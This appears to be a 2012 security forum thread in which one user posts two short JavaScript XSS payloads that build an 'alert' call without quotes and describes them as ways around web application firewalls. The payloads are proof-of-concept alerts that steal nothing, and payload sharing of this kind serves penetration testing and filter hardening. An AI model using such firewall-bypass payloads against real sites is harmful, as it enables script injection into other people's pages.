+ Reply to Thread

Results 1 to 2 of 2

Like Tree

3Likes

2 Post By [s]
1 Post By [s]

Thread: Unusual XSS Payload

LinkBack
- LinkBack URL
- About LinkBacks
- Bookmark & Share
- Digg this Thread!
- Add Thread to del.icio.us
- Bookmark in Technorati
- Tweet this thread
Thread Tools
Search Thread
- Advanced Search
Display
- Linear Mode
- Switch to Hybrid Mode
- Switch to Threaded Mode

07-27-2012, 06:29 PM #1
[s]

Security Researcher

Join Date

Nov 2010

Posts

187

Blog Entries
2

Thanks

63

Thanked 53 Times in 30 Posts
Unusual XSS Payload
Tweet

Code:

alert( String(/XSS[s]/).substr(1,4) );

Here is my payload works on mostly every where , Without quote ! which is yours ?
Share

Share this post on

Digg

Del.icio.us

Technorati

Twitter

AnArKI and fb1h2s like this.
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Reply With Quote
08-02-2012, 05:14 PM #2
[s]

Security Researcher

Join Date

Nov 2010

Posts

187

Blog Entries
2

Thanks

63

Thanked 53 Times in 30 Posts
Code:

(sessionStorage[!-1]=alert)(!-1)

Any other WAF bypass for Alert JS ?
Share

Share this post on

Digg

Del.icio.us

Technorati

Twitter

b0nd likes this.
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Reply With Quote

+ Reply to Thread

« Previous Thread | Next Thread »

Posting Permissions

You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

All times are GMT +5.5. The time now is 01:53 AM.

Powered by vBulletin® Version 4.1.7
Copyright © 2013 vBulletin Solutions, Inc. All rights reserved.
Search Engine Optimization by vBSEO

Copyright 2010 - 2012, Garage4Hackers